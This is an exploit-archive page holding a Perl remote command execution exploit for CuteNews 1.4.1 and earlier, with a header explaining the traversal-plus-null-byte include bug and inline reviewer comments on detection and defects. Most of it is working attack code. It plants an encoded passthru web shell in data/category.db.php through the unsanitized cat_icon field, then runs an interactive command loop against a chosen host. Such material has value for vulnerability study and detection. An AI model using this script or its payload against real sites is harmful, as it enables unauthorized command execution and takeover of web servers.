CuteNews <= 1.4.1 (categories.mdu) Remote Command Execution Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 

CuteNews <= 1.4.1 Remote Command Execution

Code

                                                #!/usr/bin/perl
#
# cijfer-cnxpl - CuteNews &#60;=1.4.1 Remote Command Execution
#
# Copyright (c) 2005 cijfer &#60;[email protected]&#62;
# All rights reserved.           
#
## 1. example
#
# [cijfer@kalma:/research]$ ./cijfer-cnxpl.pl -h www.xxxx.org -d /news
# [[email protected] /]$ id;uname -a
# uid=48(apache) gid=48(apache) groups=48(apache),29000(web_serving) context=root:system_r:httpd_sys_script_t
# Linux server.xxxx.org 2.6.13-1.1532_FC4 #1 Thu Oct 20 01:30:08 EDT 2005 i686 i686 i386 GNU/Linux
# [[email protected] /]$
#
## 2. explanation
#
# this particular vulnerability is already known (sort of). a
# bug as exact as this one was found by rgod in CuteNews. the
# sole difference between his and my bug, are the files that
# are being exploited. while his was a bug using the following
# string:
#
#	show_archives.php?template=../inc/ipban.mdu%00
#
# i found my bug in:
#
#	show_archives.php?template=../inc/categories.mdu%00
#
## 3. the bug
#
# the bug lies in categories.mdu, located in the /inc/ folder
# of the cutenews directory.
#
# by using the &#39;template&#39; variable in show_archives.php, we
# can include any local files. in this case, we&#39;re including
# categories.mdu. why? every .mdu file within the cutenews 
# package has raw PHP code within it, that is not protected
# like the normal .php files.
#
# $template gets sanitized, but can be bypassed depending on
# php configuration! this is why on some 1.4.0&#39;s it works and
# on some others it does not. it all depends on configuration
# and whether or not register_globals needs to be on.
#
# 	if(file_exists(&#34;$cutepath/data/${template}.tpl&#34;)){ require(&#34;$cutepath/data/${template}.tpl&#34;); }
#       ...
#
# looking into categories.mdu, we notice the following to
# create our exploit string:
#
# 	if($member_db[1] != 1){ msg(&#34;error&#34;, &#34;Access Denied&#34;, &#34;You don&#39;t have permission to edit categories&#34;); }
#       ... 
#
#	elseif($action == &#34;doedit&#34;)
# 	{
#       ...
#
# cannot write arbitrary php code to $cat_name :(
#
#	$cat_name = htmlspecialchars(stripslashes($cat_name)); 
#       ...
#
# $cat_icon lacks sanitization :))!
#
#	fwrite($new_cats, &#34;$catid|$cat_name|$cat_icon|||\n&#34;);
#       ...
#
# adding together all these elements, it is possible to inject
# php code into data/category.db.php and from there, use our
# injected code to either include a remote php shell, or run
# commands on the system.
#
##
#
# $Id: cijfer-cnxpl.pl,v 0.2 2005/12/26 03:36:00 cijfer Exp cijfer $

# Proof-of-concept for the chain described in the header comment: a
# traversal include of inc/categories.mdu through show_archives.php, then a
# second request to the PHP that categories.mdu wrote into
# data/category.db.php.  Kept exactly as the author wrote it; the
# NOTE(review) comments point out defects rather than fix them.
#
# NOTE(review): no `use strict;` / `use warnings;` -- every variable below
# is an implicit package global, and $cmds / $result are never declared.
use IO::Socket;
use Getopt::Std;
use URI::Escape;

# -h <hostname>   target host (required; plain HTTP on port 80, see below)
# -d [/directory] CuteNews web path; defaults to /cutenews inside the loop
getopts(&#34;h:d:&#34;);

$host = $opt_h;
$dirs = $opt_d;
$good = 0;   # 1 while the response is between the _START_ and _END_ markers

if(!$host)
{
	print &#34;cijfer-cnxpl.pl by cijfer\n&#34;;
        print &#34;usage: $0 -h &#60;hostname&#62; -d [/directory]\r\n&#34;;
        exit();
}

# Interactive, shell-like loop.  while() with an empty condition never
# terminates on its own; the only exits are the 403 branch below (which
# cannot trigger, see there) or an interrupt.
while()
{
	print &#34;[cijfer@&#34;.$host.&#34; /]\$ &#34;;
	# Read exactly one line from STDIN as the command to send.
	# NOTE(review): on EOF the inner loop exits without assigning, so
	# $cmds keeps its previous value (undef on the first pass) and both
	# requests below are still sent.
	while(&#60;STDIN&#62;)
	{
		$cmds=$_;
		chomp($cmds);
		last;
	}

if(!$dirs)
{
	$dirs = &#34;/cutenews&#34;;
}

# Request 1: the vulnerable include.  The template parameter carries a ../
# traversal plus a %00 to cut off the &#34;.tpl&#34; suffix quoted in header section
# 3; the remaining fields are the form variables categories.mdu expects.
# From a detection standpoint, a show_archives.php request whose template
# value contains &#34;../&#34; and &#34;%00&#34; is the signature of this attack.  The header
# also notes the include depends on PHP configuration; modern PHP rejects
# NUL bytes in include paths, which blocks this traversal outright.
$string  = $dirs;
$string .= &#34;/show_archives.php?template=../inc/categories.mdu%00&#34;;
$string .= &#34;&member_db[1]=1&#34;;                               # satisfies the $member_db[1] check quoted in the header (relies on register_globals, per section 3)
$string .= &#34;&action=doedit&#34;;                                #can be changed from &#39;doedit&#39; to &#39;add&#39; if no categories exist
$string .= &#34;&cat_name=cijfer&#34;;
$string .= &#34;&catid=1&#34;;                                      #can be changed to different value if starting catid != 0
# cat_icon is the field the header identifies as unsanitized: a
# percent-encoded PHP tag that fwrite() stores into data/category.db.php
# as-is, unlike cat_name which goes through htmlspecialchars().
$string .= &#34;&cat_icon=%3C%3Fpassthru%28%24_GET%5Bcij%5D%29%3Bdie%28%29%3B%3F%3E&#34;;

# Request 2: fetch the file just written.  The cij parameter wraps the
# command between percent-encoded &#34;echo _START_;&#34; and &#34;; echo _END_&#34; so the
# output can be cut out of the surrounding HTML in the read loop below.
$cijfer  = $dirs;
$cijfer .= &#34;/data/category.db.php?cij=&#34;;
$cijfer .= uri_escape(&#34;echo; &#34;);
$cijfer .= &#34;%20%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20&#34;; # _START_
$cijfer .= uri_escape($cmds);
$cijfer .= &#34;%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&#34;;          # _END_

# NOTE(review): port 80 and bare &#34;\n&#34; line endings are hard-coded (HTTP
# specifies CRLF; most servers tolerate LF).  The response to this first
# request is never read, and the handle is overwritten -- not closed -- by
# the second connect below.
$sock = IO::Socket::INET-&#62;new( Proto =&#62; &#34;tcp&#34;, PeerAddr =&#62; $host, PeerPort =&#62; 80) || die &#34;error: connect()\n&#34;;

print $sock &#34;GET $string HTTP/1.1\n&#34;;
print $sock &#34;Host: $host\n&#34;;
print $sock &#34;Accept: */*\n&#34;;
print $sock &#34;Connection: close\n\n&#34;;

$sock = IO::Socket::INET-&#62;new( Proto =&#62; &#34;tcp&#34;, PeerAddr =&#62; $host, PeerPort =&#62; 80) || die &#34;error: connect()\n&#34;;

print $sock &#34;GET $cijfer HTTP/1.1\n&#34;;
print $sock &#34;Host: $host\n&#34;;
print $sock &#34;Accept: */*\n&#34;;
print $sock &#34;Connection: close\n\n&#34;;

# Print only the response lines that fall between _START_ and _END_.
# $good is toggled by the marker lines; the marker lines themselves are
# not printed because the _END_ test runs before and the _START_ test
# after the print.
while($result = &#60;$sock&#62;)
{
	# NOTE(review): this matches against $sock (the socket object, which
	# stringifies as a class/GLOB description), not against $result, so
	# the branch can never fire.  Even $result would not start with 403:
	# an HTTP status line begins with &#34;HTTP/&#34;.
	if($sock =~ /^403/)
	{
		print &#34;error: 403\n&#34;;
		exit();
	}
	if($result =~ /^_END_/)
	{
		$good=0;
	}

	if($good==1)
	{
        	print $result;
	}

	if($result =~ /^_START_/)
	{
		$good=1;
	}
}
}

# milw0rm.com [2006-01-01]

                              
